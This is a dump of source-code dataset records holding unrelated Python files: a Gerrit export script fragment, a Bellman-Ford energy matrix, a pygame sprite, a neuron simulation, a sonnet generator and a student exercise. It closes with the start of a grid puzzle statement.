LOCAL_CODE_BASE, \"does not exist! \\033[0m\")\n exit(1)\n get_patch_method = 2\n print(\"\\033[1;31;40m Warning!!! \\033[0m\")\n print(\"\\033[1;31;40m You will generate the patch from code base:\", LOCAL_CODE_BASE, \"! \", \"\\033[0m\")\n print(\"\\033[1;31;40m Please ensure the code base is updated to latest! \\033[0m\")\n\n username, password = input_user_profile()\n useCookie = False\n connect_session = None\n if str_is_empty(username) or str_is_empty(password):\n print(\"username or password is empty\")\n useCookie = True\n if not useCookie:\n connect_session = requests.session()\n login_status_code = login_site(connect_session, LOGIN_URL, username, password)\n if login_status_code != 200:\n print(\"Can not login in, exit\")\n exit(0)\n url = QUERY_URL\n continue_flag = 0\n #写标题\n \n with open(EXPORT_CSV_PATH, \"w\") as csvfile:\n writer = csv.writer(csvfile)\n writer.writerow([\"project\", \"branch\", \"subject\", \"owner\", \"link\", \"commit_id\", \"updated\"])\n # 循环爬下一页\n while (continue_flag >= 0):\n continue_flag, url = request_general_info(connect_session, url, continue_flag)\n #continue_flag, url = requesst2(url, continue_flag)\n #处理数据并可视化\n #view_format_count(subject_format_count())\n\n\nif __name__ == '__main__':\n main()\n###################################################\n# End of File\n###################################################\n","sub_path":"python/gerrit_changes.py","file_name":"gerrit_changes.py","file_ext":"py","file_size_in_byte":16829,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"1945136","text":"# py 2.7\nimport copy\nimport networkx as nx\nimport numpy as np\nimport pandas as pd\n\nfrom collections import deque\n\ndef add_symmetry(df):\n\n for i in df.index:\n for j in df.columns:\n if df.loc[i,j]!=0:\n df.loc[j,i] = -1*(df.loc[i,j])\n\n return(df)\n\ndef from_pd_df(df):\n\n gr = nx.DiGraph()\n for i in df.index:\n for j in df.columns:\n if df.loc[i, j] != 0:\n gr.add_edge(i, j, weight=df.loc[i, j])\n return(gr)\n\ndef bellman_ford(G, source, weight='weight'):\n \"\"\"Compute shortest path lengths and predecessors on shortest paths\n in weighted graphs.\n\n The algorithm has a running time of O(mn) where n is the number of\n nodes and m is the number of edges. It is slower than Dijkstra but\n can handle negative edge weights.\n\n Parameters\n ----------\n G : NetworkX graph\n The algorithm works for all types of graphs, including directed\n graphs and multigraphs.\n\n source: node label\n Starting node for path\n\n weight: string, optional (default='weight')\n Edge data key corresponding to the edge weight\n\n Returns\n -------\n pred, dist : dictionaries\n Returns two dictionaries keyed by node to predecessor in the\n path and to the distance from the source respectively.\n\n Raises\n ------\n NetworkXUnbounded\n If the (di)graph contains a negative cost (di)cycle, the\n algorithm raises an exception to indicate the presence of the\n negative cost (di)cycle. Note: any negative weight edge in an\n undirected graph is a negative cost cycle.\n\n Examples\n --------\n >>> import networkx as nx\n >>> G = nx.path_graph(5, create_using = nx.DiGraph())\n >>> pred, dist = nx.bellman_ford(G, 0)\n >>> sorted(pred.items())\n [(0, None), (1, 0), (2, 1), (3, 2), (4, 3)]\n >>> sorted(dist.items())\n [(0, 0), (1, 1), (2, 2), (3, 3), (4, 4)]\n\n >>> from nose.tools import assert_raises\n >>> G = nx.cycle_graph(5, create_using = nx.DiGraph())\n >>> G[1][2]['weight'] = -7\n >>> assert_raises(nx.NetworkXUnbounded, nx.bellman_ford, G, 0)\n\n Notes\n -----\n Edge weight attributes must be numerical.\n Distances are calculated as sums of weighted edges traversed.\n\n The dictionaries returned only have keys for nodes reachable from\n the source.\n\n In the case where the (di)graph is not connected, if a component\n not containing the source contains a negative cost (di)cycle, it\n will not be detected.\n\n \"\"\"\n if source not in G:\n raise KeyError(\"Node %s is not found in the graph\" % source)\n\n for u, v, attr in G.selfloop_edges(data=True):\n if attr.get(weight, 1) < 0:\n raise nx.NetworkXUnbounded(\"Negative cost cycle detected.\")\n\n dist = {source: 0}\n pred = {source: None}\n\n if len(G) == 1:\n return pred, dist\n\n return _bellman_ford_relaxation(G, pred, dist, [source], weight)\n\ndef _bellman_ford_relaxation(G, pred, dist, source, weight):\n \"\"\"Relaxation loop for Bellman–Ford algorithm\n\n Parameters\n ----------\n G : NetworkX graph\n\n pred: dict\n Keyed by node to predecessor in the path\n\n dist: dict\n Keyed by node to the distance from the source\n\n source: list\n List of source nodes\n\n weight: string\n Edge data key corresponding to the edge weight\n\n Returns\n -------\n Returns two dictionaries keyed by node to predecessor in the\n path and to the distance from the source respectively.\n\n Raises\n ------\n NetworkXUnbounded\n If the (di)graph contains a negative cost (di)cycle, the\n algorithm raises an exception to indicate the presence of the\n negative cost (di)cycle. Note: any negative weight edge in an\n undirected graph is a negative cost cycle\n \"\"\"\n if G.is_multigraph():\n def get_weight(edge_dict):\n return min(eattr.get(weight, 1) for eattr in edge_dict.values())\n else:\n def get_weight(edge_dict):\n return edge_dict.get(weight, 1)\n\n G_succ = G.succ if G.is_directed() else G.adj\n inf = float('inf')\n n = len(G)\n\n count = {}\n q = deque(source)\n in_q = set(source)\n while q:\n u = q.popleft()\n in_q.remove(u)\n # Skip relaxations if the predecessor of u is in the queue.\n if pred[u] not in in_q:\n dist_u = dist[u]\n for v, e in G_succ[u].items():\n dist_v = dist_u + get_weight(e)\n if dist_v < dist.get(v, inf):\n if v not in in_q:\n q.append(v)\n in_q.add(v)\n count_v = count.get(v, 0) + 1\n if count_v == n:\n raise nx.NetworkXUnbounded(\n \"Negative cost cycle detected.\")\n count[v] = count_v\n dist[v] = dist_v\n pred[v] = u\n\n return pred, dist\n\ndef fill_zeros(df):\n\n temp = copy.copy(df)\n\n # Deal only with positive energy reactions\n temp[temp<0] = 0\n # Maximisation => MInimisation\n temp = -1*temp\n\n gr = from_pd_df(temp)\n\n for i in temp.index:\n\n try:\n p = bellman_ford(gr, i, weight = 'weight')\n\n except nx.NetworkXUnbounded:\n print('{} is involved in an infinite cycle'.format(i))\n\n return(None)\n\n for j in p[1]:\n if df.loc[i,j] == 0:\n # Add a small fee for direct reaction to aid symbiotic chains\n temp.loc[i,j] = p[1][j] + 0.05\n temp.loc[j, i] = -1*p[1][j]\n\n temp = -1*temp\n\n temp = add_symmetry(temp)\n\n return(temp)\n\nnames = [_ for _ in 'ABCDEFGHJK']\n\nen_df = pd.DataFrame(np.zeros((10,10)), index=names, columns=names)\n\n# cycle1\nen_df.loc['A','F'] = 1.9\nen_df.loc['F','B'] = 0.8\nen_df.loc['B', 'G'] = 4.6\nen_df.loc['G','C'] = 1.5\n# Direct a -> c should be no more than indirect conversion\nen_df.loc['A','C'] = 8.7\n\n# cycle2\nen_df.loc['H','D'] = 5\nen_df.loc['H','E'] = 2\nen_df.loc['E','J'] = 1.1\n\nen_df.loc['K','E'] = 1.2\n\nen_df.loc['H', 'G'] = 1\n\nen_df = add_symmetry(en_df)\nx = fill_zeros(en_df)\n\n","sub_path":"Graphs_and_such/energy_matrix.py","file_name":"energy_matrix.py","file_ext":"py","file_size_in_byte":6176,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"544179020","text":"#Create a function that computes the factorial of a number \n#using a standard for loop. Example:\n # 5! = 5 * 4 * 3 * 2 * 1\n #factorial_with_for_loop(5) # 120\n \n\n\"\"\"def factorial_for(n):\n for i in range(1, n) :\n fact = (n * (n - 1) * (n - 2) * (n - 3) * (n - 4))\n print(fact)\n\nfactorial_for(4)\n\n\"\"\"\n\nresult = 1\n\n\ndef sum_numbers(n):\n \n for i in range(1, n + 1):\n result = result + i\n return result\n\nsum_numbers(3) \n \n","sub_path":"class-9/Kellie/ex_1.py","file_name":"ex_1.py","file_ext":"py","file_size_in_byte":455,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"591388446","text":"import pygame\r\n\r\n\r\nclass Explosion(pygame.sprite.Sprite):\r\n def __init__(self, image_dict, center, size):\r\n pygame.sprite.Sprite.__init__(self)\r\n self.size = size\r\n self.image_dict = image_dict\r\n self.image = self.image_dict[self.size][0]\r\n self.rect = self.image.get_rect()\r\n self.rect.center = center\r\n self.frame = 0\r\n self.frame_delay = 50\r\n self.timer = pygame.time.get_ticks()\r\n\r\n def update(self):\r\n now = pygame.time.get_ticks()\r\n if now - self.timer > self.frame_delay:\r\n self.timer = now\r\n self.frame += 1\r\n if self.frame < 9:\r\n old_center = self.rect.center\r\n self.image = self.image_dict[self.size][self.frame]\r\n self.rect = self.image.get_rect()\r\n self.rect.center = old_center\r\n else:\r\n self.kill()\r\n","sub_path":"explosion.py","file_name":"explosion.py","file_ext":"py","file_size_in_byte":916,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"272157719","text":"#!/usr/bin/env python3\nimport sys\n\nif len(sys.argv) == 2:\n fn = sys.argv[1]\nelse:\n exit(0)\n\ninput = open(fn)\nlines = input.readlines()\nfor line in lines:\n print(line.rstrip())\n\n","sub_path":"code/python/lines.py","file_name":"lines.py","file_ext":"py","file_size_in_byte":186,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"219408230","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Tue Apr 24 22:37:45 2018\r\n\r\n@author: M.Ali GÜL\r\n\"\"\"\r\n\r\nfrom brian2 import *\r\nfrom numpy import *\r\nfrom matplotlib.pyplot import *\r\n\r\nstart_scope()\r\n###############################################################################\r\n#Thalamic Cell Model\r\nN_THL = 80\r\nC_THL = 13\r\nvr_THL = -60\r\nvt_THL = -50\r\nk_THL = 0.11\r\na_THL = 0.05\r\nb_THL = 2\r\nc_THL = -65\r\nd_THL = 2\r\nvpeak_THL = 35\r\n\r\neqsTHL = '''\r\ndv/dt = (((k_THL*(v-vr_THL)*(v-vt_THL)) - u + I)/C_THL)/ms : 1\r\ndu/dt = a*(b*(v-vr_THL)-u)/ms : 1\r\nvr : 1\r\nvt : 1\r\na : 1\r\nb : 1\r\nd : 1\r\nc : 1\r\nI : 1\r\n'''\r\nreset_THL = '''\r\nv = c - 0.1*u\r\nu = u + d\r\n'''\r\nGTHL = NeuronGroup(N_THL, eqsTHL, method='euler', threshold = 'v>vpeak_THL+0.1*u',reset = reset_THL)\r\nGTHL.vr = vr_THL\r\nGTHL.vt = vt_THL\r\nGTHL.a = a_THL\r\nGTHL.b = b_THL\r\nGTHL.c = c_THL\r\nGTHL.d = d_THL\r\nGTHL.v = vr_THL\r\nGTHL.u = GTHL.b*(GTHL.v)\r\n###############################################################################\r\nstm = StateMonitor(GTHL, 'v', record = True)\r\nstm2 = StateMonitor(GTHL, 'I', record = True)\r\nspk = SpikeMonitor(GTHL)\r\n\r\nGTHL.I = 0\r\nrun(100*ms)\r\n\r\nGTHL.I = 100\r\nrun(200*ms)\r\n\r\nGTHL.I = 0\r\nrun(100*ms)\r\n\r\nGTHL.I = 200\r\nrun(200*ms)\r\n\r\nGTHL.I = 0\r\nrun(100*ms)\r\n\r\nGTHL.I = -100\r\nrun(200*ms)\r\n\r\nGTHL.I = 0\r\nrun(100*ms)\r\n'''\r\nGTHL.I = 100\r\nrun(1000*ms)\r\n\r\nGTHL.I = 0\r\nrun(400*ms)\r\n'''\r\nfigure(figsize=(18,6))\r\nsubplot(30,1,(1,24))\r\nplot(stm.t/ms, stm.v[0], 'r', lw = 1.5)\r\nxlim((0,1000))\r\nylabel('mV',fontsize = 16)\r\ntitle('Thalamus',fontsize = 32)\r\n\r\nsubplot(30,1,(26,30))\r\nplot(stm2.t/ms, stm2.I[0], 'r', lw=3)\r\nylim(min(stm2.I[0]),max(stm2.I[0])+20)\r\nxlabel('Time (ms)',fontsize = 16)\r\nylabel('I (uA)',fontsize = 16)","sub_path":"Last_THL_one_cell.py","file_name":"Last_THL_one_cell.py","file_ext":"py","file_size_in_byte":1682,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"143014221","text":"from jedzenielib.ingredient import Ingredient\nfrom jedzenielib.food import FOOD_TYPE\nfrom jedzenielib.food import Food\n\nimport linecache \n\n__iMeatEnd = -1\n__iVeganEnd = -1\n__iVegetarianEnd = -1\n\n__iMeatStart = -1\n__iVeganStart = -1\n__iVegetarianStart = -1\n\ndef parseIndexes(szCurrLine, index):\n global __iMeatStart \n global __iVeganStart \n global __iVegetarianStart \n global __iMeatEnd \n global __iVeganEnd \n global __iVegetarianEnd \n \n if(szCurrLine == \"# BEGIN MEAT MEALS\\n\"):\n __iMeatStart = index \n elif ( szCurrLine == \"# BEGIN VEGAN MEALS\\n\"):\n __iVeganStart = index \n elif ( szCurrLine == \"# BEGIN VEGETARIAN MEALS\\n\"):\n __iVegetarianStart = index \n elif ( szCurrLine == \"# END MEAT MEALS\\n\"):\n __iMeatEnd = index \n elif ( szCurrLine == \"# END VEGETARIAN MEALS\\n\"):\n __iVegetarianEnd = index \n elif ( szCurrLine == \"# END VEGAN MEALS\\n\"):\n __iVeganEnd = index \n\ndef createFood(fileContent, startIndex, currType):\n currIndex = startIndex \n splittedMeal = fileContent[currIndex].split(' ')\n mealName = splittedMeal[3].rstrip('\\n')\n currIndex += 1\n\n foodToAdd = Food(mealName, currType)\n\n while fileContent[currIndex] != \"\\t# END MEAL\\n\":\n currPrice = 0.0\n currWeight = 0\n currName = \"\"\n listIngredient = fileContent[currIndex].split('\\t')\n currPrice = float(listIngredient[3])\n currWeight = int(listIngredient[2])\n currName = listIngredient[1]\n ingredientToAdd = Ingredient(currName, currPrice, currWeight)\n \n\n foodToAdd.addIngredient(ingredientToAdd)\n currIndex+=1\n\n return foodToAdd \ndef parseFoods(fileContent):\n foodList = []\n currIndex = __iMeatStart\n maxIndex = __iMeatEnd \n while currIndex < maxIndex:\n if(fileContent[currIndex].startswith('\\t# BEGIN')):\n foodList.append( createFood(fileContent, currIndex, FOOD_TYPE.MEAT))\n currIndex += 1\n \n currIndex = __iVeganStart \n maxIndex = __iVeganEnd \n while currIndex < maxIndex:\n if(fileContent[currIndex].startswith('\\t# BEGIN')):\n foodList.append( createFood(fileContent, currIndex, FOOD_TYPE.VEGAN))\n currIndex += 1\n \n\n currIndex = __iVegetarianStart\n maxIndex = __iVegetarianEnd \n while currIndex < maxIndex:\n if(fileContent[currIndex].startswith('\\t# BEGIN')):\n foodList.append( createFood(fileContent, currIndex, FOOD_TYPE.VEGETARIAN))\n currIndex += 1\n return foodList;\n\n\ndef getFoods(szPath):\n print(\"Get foods, version 0.0.1, Marek Szwajka\")\n mealFile = open(szPath, \"r\")\n contentFile = mealFile.readlines()\n index = 0\n for currLine in contentFile:\n parseIndexes(currLine, index)\n index += 1\n\n toRet = parseFoods(contentFile)\n \n mealFile.close()\n return toRet;\n","sub_path":"build/lib/jedzenielib/fileLoader.py","file_name":"fileLoader.py","file_ext":"py","file_size_in_byte":2856,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"531690482","text":"# Create a tmp file to pass the chosen field class to wkb class\nf = open('tmp_config.py','w')\nf.write('fieldclass=\\'Double2dNullSeparator\\'')\nf.close()\n# Path relative to main directory\nimport sys\nsys.path.append('../')\n# Import\nimport matplotlib.pyplot as plt\nimport wkb_fast_zerobeta as wkb\nimport math\nfrom magnetic_field import Double2dNullSeparator as magnetic_field\nimport numpy as np\n# Remove the f\nimport os\nos.remove('tmp_config.py')\n\n\n# Plot fieldlines as contours of the flux functon\nx0 = -2.5 \nx1 = 2.5 \ny0 = x0 \ny1 = x1\nnx = 300\nny = nx\ngx = np.linspace(x0,x1,nx)\ngy = np.linspace(y0,y1,ny)\n\naz = np.zeros([nx,ny])\n\nfor iy in range(0,ny-1):\n for ix in range(0,nx-1):\n b = magnetic_field(gx[ix],gy[iy], 0.0)\n az[iy,ix] = b.az \n\n#plt.rcParams['contour.negative_linestyle'] = 'solid'\n#plt.contour(gx,gy,az,25,colors='blue')\n#plt.contour(gx,gy,az,levels=[0],colors='red')\n\n# solve the rays iteratively\nx0 = -1.\ny0 = 0.\nz0 = 0.\nd = 0.1 # radius\nnrays =40\ndphi_dr = -1.0\nt_end = 23.0\ns_end = t_end / 2.0 / math.pi \nns = 100\n\nswarm1 = wkb.Swarm.init_circle_zplane(x0,y0,z0,d,nrays,dphi_dr)\nswarm1.solve(s_end,ns)\n\n#for myray in swarm1.rays:\n# plt.plot(myray.x,myray.y,'black')\n#plt.xlabel('x')\n#plt.ylabel('y')\n#plt.axis([-2,2, -2,2])\n#plt.show()\n\n\n\nprint('ODE solve for swarm done. Now making the figures at the sampling times')\n\noutdir = 'frames/'\nif not os.path.exists(outdir):\n os.mkdir(outdir)\n\nfor i in range(0,ns-1):\n plt.contour(gx,gy,az,levels=[0],colors='red')\n for myray in swarm1.rays:\n plt.plot(myray.x[i],myray.y[i],'k+') # ko is ok too\n if i > 4:\n plt.plot(myray.x[i-3:i],myray.y[i-3:i],'k')\n title = '{:0.2f}'.format(swarm1.rays[1].t[i])\n title = 't = '+title\n plt.xlabel('x')\n plt.ylabel('y')\n plt.title(title)\n plt.axis([-2,2,-2,2])\n filename = '{:04d}'.format(i)\n filename = outdir+'/'+filename+'.png'\n plt.savefig(filename,dpi=300)\n msg = 'saved image '+filename \n print(msg)\n plt.clf()\n","sub_path":"SR/circswarm_field_sep_movie.py","file_name":"circswarm_field_sep_movie.py","file_ext":"py","file_size_in_byte":2007,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"593450170","text":"import numpy as np\nimport pickle\nfrom collections import defaultdict\nfrom py_files import helper\nimport random\nfrom py_files import line\n#from sonnet_basic import *\n#from sonnet_basic import *\n\nclass Sonnet_Gen():\n def __init__(self,postag_file='saved_objects/postag_dict_all+VBN.p',\n syllables_file='saved_objects/cmudict-0.7b.txt',\n wv_file='saved_objects/word2vec/model.txt',\n top_file='saved_objects/words/top_words.txt' ,\n extra_stress_file='saved_objects/edwins_extra_stresses.txt', prompt=False):\n with open(postag_file, 'rb') as f:\n postag_dict = pickle.load(f)\n self.pos_to_words = postag_dict[1]\n self.words_to_pos = postag_dict[2]\n #these are the hardcoded scenery words\n self.pos_to_words[\"scNNS\"] = [\"forests\", \"branches\", \"roots\", \"twigs\", \"brambles\", \"fruits\", \"thorns\", \"bushes\", \"trees\", \"foliages\", \"stumps\", \"weeds\"]\n self.pos_to_words[\"scJJS\"] = [\"darkest\", \"deepest\", \"strangest\", \"longest\", \"silentest\", \"quietest\", \"mysteriousest\", \"lonliest\", \"saddest\", \"eeriest\"]\n self.pos_to_words[\"scJJ\"] = [\"dark\", \"deep\", \"strange\", \"long\", \"silent\", \"quiet\",\n \"mysterious\", \"lonely\", \"sad\", \"eerie\"]\n for item in self.pos_to_words[\"scNNS\"]: #we need to update the pos_to_words dictionary for each word\n if item not in self.words_to_pos.keys():\n self.words_to_pos[item] = [\"scNNS\"]\n else:\n self.words_to_pos[item].append(\"scNNS\")\n for item in self.pos_to_words[\"scJJS\"]:\n if item not in self.words_to_pos.keys():\n self.words_to_pos[item] = [\"scJJS\"]\n else:\n self.words_to_pos[item].append(\"scJJS\")\n for item in self.pos_to_words[\"scJJ\"]:\n if item not in self.words_to_pos.keys():\n self.words_to_pos[item] = [\"scJJ\"]\n else:\n self.words_to_pos[item].append(\"scJJ\")\n\n self.special_words = helper.get_finer_pos_words()\n\n self.api_url = 'https://api.datamuse.com/words'\n\n with open(top_file) as tf:\n self.top_common_words = [line.strip() for line in tf.readlines()]\n\n\n with open(\"saved_objects/filtered_nouns_verbs.txt\", \"r\") as hf:\n self.filtered_nouns_verbs = [line.strip() for line in hf.readlines()]\n self.filtered_nouns_verbs += self.pos_to_words[\"IN\"] + self.pos_to_words[\"PRP\"]\n\n self.dict_meters = helper.create_syll_dict([syllables_file], extra_stress_file)\n \"\"\"try:\n with open(\"saved_objects/w2v.p\", \"rb\") as pickle_in:\n self.poetic_vectors = pickle.load(pickle_in)\n except:\n print(\"loading vectors....\")\n with open(\"saved_objects/w2v.p\", \"wb\") as pickle_in:\n #self.poetic_vectors = KeyedVectors.load_word2vec_format(wv_file, binary=False)\n self.poetic_vectors = self.filtered_nouns_verbs\n pickle.dump(self.poetic_vectors, pickle_in)\n print(\"loaded\")\"\"\"\n\n #print(self.poetic_vectors.shape)\n\n #with open(\"poems/shakespeare_tagged.p\", \"rb\") as pickle_in:\n # self.templates = pickle.load(pickle_in)\n #print(len(self.templates))\n\n with open(\"poems/end_pos.txt\", \"r\") as pickin:\n list = pickin.readlines()\n self.end_pos = {}\n for l in list:\n self.end_pos[l.split()[0]] = l.split()[1:]\n #self.end_pos['NNP'] = []\n\n self.pos_syllables = helper.create_pos_syllables(self.pos_to_words, self.dict_meters)\n\n with open(\"saved_objects/pos_sylls_mode.p\", \"rb\") as pickle_in:\n self.pos_sylls_mode = pickle.load(pickle_in)\n\n #with open(\"saved_objects/template_to_line.pickle\", \"rb\") as pickle_in:\n # self.templates = list(pickle.load(pickle_in).keys()) #update with sonnet ones one day\n\n #with open(\"saved_objects/template_no_punc.pickle\", \"rb\") as pickle_in:\n # self.templates = pickle.load(pickle_in)\n\n with open(\"poems/ben_templates.txt\", \"r\") as templs: #changed\n self.templates = {}\n self.tempnums = {}\n lines = templs.readlines()\n count = 1\n for line in lines:\n self.templates[\" \".join(line.split()[:-1])] = line.split()[-1].strip()\n self.tempnums[count] = \" \".join(line.split()[:-1])\n count += 1\n\n \"\"\"with open(\"saved_objects/loop_counts.txt\", \"r\") as l_c:\n self.max_loop = int(l_c.readlines()[-1])\"\"\"\n\n if prompt:\n self.gen_poem_scenic(prompt)\n\n def gen_poem_scenic(self, prompt, print_poem=True):\n \"\"\"\n\n Parameters\n ----------\n prompt - the word the base the poem on\n print_poem - optional parameter to print output\n\n Returns - a sonnet\n -------\n 1. generate a rhyme set\n 2. For every line pick a random word from the set:\n a. Get a random template which ends with the POS and meter of that word\n b. Get a random word which fits the POS and meter of the next word (working backwards)\n c. Repeat until template finished\n 3. Repeat for 14 lines\n\n \"\"\"\n #Get rhyming words\n #at some point implement narrative trajectory stuff\n rhyme_dict = {}\n #tone = ['good','good', 'good', 'good', 'bad', 'bad', 'excellent'] #for example\n #for i,j in zip(['A', 'B', 'C', 'D', 'E', 'F', 'G'], tone):\n # rhyme_dict[i] = self.getRhymes([prompt,j]) #one day pass [prompt, narr]\n last_word_dict_complete = False\n while not last_word_dict_complete:\n for i in ['A', 'B']:\n rhyme_dict[i] = self.getRhymes([prompt], words=self.filtered_nouns_verbs)\n last_word_dict = self.last_word_dict(rhyme_dict)\n last_word_dict_complete = True\n for key in last_word_dict.keys():\n if len(last_word_dict[key]) == 0:\n last_word_dict_complete = False\n #for now we shall generate random words, but they will fit the meter, rhyme and templates\n\n candidates = [\" ----\" + prompt.upper() + \"----\"]\n used_templates = []\n\n for line_number in range(1, 5):\n template = self.tempnums[line_number]\n pos_needed = template.split()\n first_word = random.choice(list(last_word_dict[line_number])) # last word is decided in last_word_dict\n\n #while first_word not in self.dict_meters.keys() or not self.suitable_last_word(first_word): #make sure its valid\n while not self.suitable_last_word(first_word, template):#changed valid check to ignore meter\n first_word = random.choice(list(last_word_dict[line_number]))\n\n\n in_template = self.get_word_pos(first_word)[0]\n\n while in_template != self.tempnums[line_number].split()[-1]:\n in_template = random.choice(self.get_word_pos(first_word)) #some words have multiple POS so make sure it picks the one with an existing template\n\n curr_line = first_word\n\n while len(curr_line.split()) < len(template.split()): #iterates until line is complete\n #if reset: print(\"HI\", curr_line.text)\n\n \"\"\"\n while not template:\n print(\"no template\", curr_line.pos_template, curr_line.text)\n first_w = curr_line.text.split()[0]\n first_pos = self.get_word_pos(first_w)\n\n if len(first_pos) > 1:\n curr_line.pos_template = random.choice(first_pos) + curr_line.pos_template[len(curr_line.pos_template.split()[0]):]\n template = self.get_random_template(curr_line.pos_template, curr_line.meter)\n\n else:\n print(\"unfixable\")\n print(1/0)\n \"\"\"\n\n next_pos = pos_needed[-len(curr_line.split()) - 1] #gets next POS from the right\n poss_words = self.get_pos_words(next_pos) #gets all possible words which fit pos and NOT meter\n\n if not poss_words:\n print(\"no words\", next_pos, template)\n print(1/0) #if there arent, die\n\n next_word = random.choice(poss_words) #pick word randomly\n\n curr_line = next_word + \" \" + curr_line #updates line\n #template = False #make a parameter?\n\n #line finished generating\n print(\"adding line\", line_number)\n print(curr_line)\n candidates.append(curr_line)\n\n #poem finished generating\n if print_poem:\n print(\"\")\n print(candidates[0])\n del candidates[0]\n for cand in range(len(candidates)):\n print(candidates[cand])#, \": \", candidates[cand].meter)\n if( (cand + 1) % 4 == 0): print(\"\")\n #return candidates\n\n\n def get_word_pos(self, word):\n \"\"\"\n Get the set of POS category of a word. If we are unable to get the category, return None.\n \"\"\"\n # Special case\n if word.upper() in self.special_words:\n return [word.upper()]\n if word not in self.words_to_pos:\n return None\n return self.words_to_pos[word]\n\n def get_pos_words(self,pos, meter=None):\n \"\"\"\n Gets all the words of a given POS\n Parameters\n ----------\n pos - the POS you want\n meter - (optional) returns only words which fit the given meter, e.g. 101\n \"\"\"\n if pos in self.special_words:\n return [pos.lower()]\n if pos not in self.pos_to_words:\n return None\n if meter:\n ret = [word for word in self.pos_to_words[pos] if word in self.dict_meters and meter in self.dict_meters[word]]\n if len(ret) == 0:\n return False\n return ret\n return self.pos_to_words[pos]\n\n def getRhymes(self, theme, words):\n \"\"\"\n :param theme: an array of either [prompt] or [prompt, line_theme] to find similar words to. JUST PROMPT FOR NOW\n :return: all words which rhyme with similar words to the theme in format {similar word: [rhyming words], similar word: [rhyming words], etc.}\n \"\"\"\n if len(theme) > 1:\n prompt = theme[0]\n tone = theme[1:]\n else:\n prompt = theme[0]\n tone = \"NONE\"\n try:\n with open(\"saved_objects/saved_rhymes\", \"rb\") as pickle_in:\n mydict = pickle.load(pickle_in)\n\n except:\n with open(\"saved_objects/saved_rhymes\", \"wb\") as pickle_in:\n mydict = {}\n pickle.dump(mydict, pickle_in)\n if prompt not in mydict.keys():\n mydict[prompt] = {}\n if tone not in mydict[prompt].keys():\n print(\"havent stored anything for \", theme, \"please wait...\")\n print(\" (ignore the warnings) \")\n words = helper.get_similar_word_henry(theme, n_return=20, word_set=set(words))\n w_rhyme_dict = {w3: {word for word in helper.get_rhyming_words_one_step_henry(self.api_url, w3) if\n word in self.filtered_nouns_verbs and word in self.dict_meters.keys() and word not in self.top_common_words[:70]} for #deleted: and self.filter_common_word_henry(word, fast=True)\n w3 in words if w3 not in self.top_common_words[:70] and w3 in self.dict_meters.keys()}\n\n #if len(w_rhyme_dict) > 0:\n mydict[prompt][tone] = {k: v for k, v in w_rhyme_dict.items() if len(v) > 0}\n\n with open(\"saved_objects/saved_rhymes\", \"wb\") as pickle_in:\n pickle.dump(mydict, pickle_in)\n return mydict[prompt][tone]\n\n def last_word_dict(self, rhyme_dict):\n \"\"\"\n Given the rhyme sets, extract all possible last words from the rhyme set\n dictionaries.\n\n Parameters\n ----------\n rhyme_dict: dictionary\n Format is {'A': {tone1 : {similar word: [rhyming words], similar word: [rhyming words], etc.}}, {tone2:{...}}},\n 'B': {tone1 : {similar word: [rhyming words], similar word: [rhyming words], etc.}}, {tone2:{...}}}\n etc\n Returns\n -------\n dictionary\n Format is {1: ['apple', 'orange'], 2: ['apple', orange] ... }\n\n \"\"\"\n scheme = {1: 'A', 2: 'B', 3: 'A', 4: 'B'}\n last_word_dict={}\n\n\n \"\"\"for i in range(1,15):\n temp = []\n if i in [1,2,5,6,9,10,13]: #lines with a new rhyme\n for k in rhyme_dict[scheme[i]].keys():\n temp.append(k)\n if i in [3,4,7,8,11,12,14]: #lines with an old line\n for k in rhyme_dict[scheme[i]].keys():\n temp += rhyme_dict[scheme[i]][k]\n #last_word_dict[i]=[*{*temp}]\n last_word_dict[i] = temp\"\"\"\n first_rhymes = []\n for i in range(1,5):\n if i in [1, 2]: # lines with a new rhyme -> pick a random key\n last_word_dict[i] = [random.choice(list(rhyme_dict[scheme[i]].keys()))] #NB ensure it doesnt pick the same as another one\n while not self.suitable_last_word(last_word_dict[i][0], self.tempnums[i]) or last_word_dict[i][0] in first_rhymes or any(rhyme_dict['A'][last_word_dict[i][0]] in rhyme_dict['A'][word] for word in first_rhymes):\n last_word_dict[i] = [random.choice(list(rhyme_dict[scheme[i]].keys()))]\n first_rhymes.append(last_word_dict[i][0])\n if i in [3, 4]: # lines with an old rhyme -> pick a random value corresponding to key of rhyming couplet\n letter = scheme[i]\n pair = last_word_dict[i-2][0]\n last_word_dict[i] = [word for word in rhyme_dict[letter][pair] if self.suitable_last_word(word, self.tempnums[i])]\n\n return last_word_dict\n\n def suitable_last_word(self, word, template): #checks if word has the part of speech of the last word in the template\n needed_pos = template.split()[-1]\n return any([w == needed_pos for w in self.words_to_pos[word]])\n","sub_path":"ben_test_scenery.py","file_name":"ben_test_scenery.py","file_ext":"py","file_size_in_byte":14356,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"115990778","text":"# google\n\"\"\"\nOn an N x N grid, each square grid[i][j] represents the elevation at that point (i,j).\n\nNow rain starts to fall. At time t, the depth of the water everywhere is t. You can swim from a square to another 4-directionally\nadjacent square if and only if the elevation of both squares individually are at most t. You can swim infinite distance in zero time. Of\ncourse, you must stay within the boundaries of the grid during your swim.\n\nYou start at the top left square (0, 0). What is the least time until you can reach the bottom right square (N-1, N-1)?\n\nExample 1:\nInput: [[0,2],[1,3]]\nOutput: 3\nExplanation:\nAt time 0, you are in grid location (0, 0).\nYou cannot go anywhere else because 4-directionally adjacent neighbors have a higher elevation than t = 0.\nYou cannot reach point (1, 1) until time 3.\nWhen the depth of water is 3, we can swim anywhere inside the grid.\n\nExample 2:\nInput: 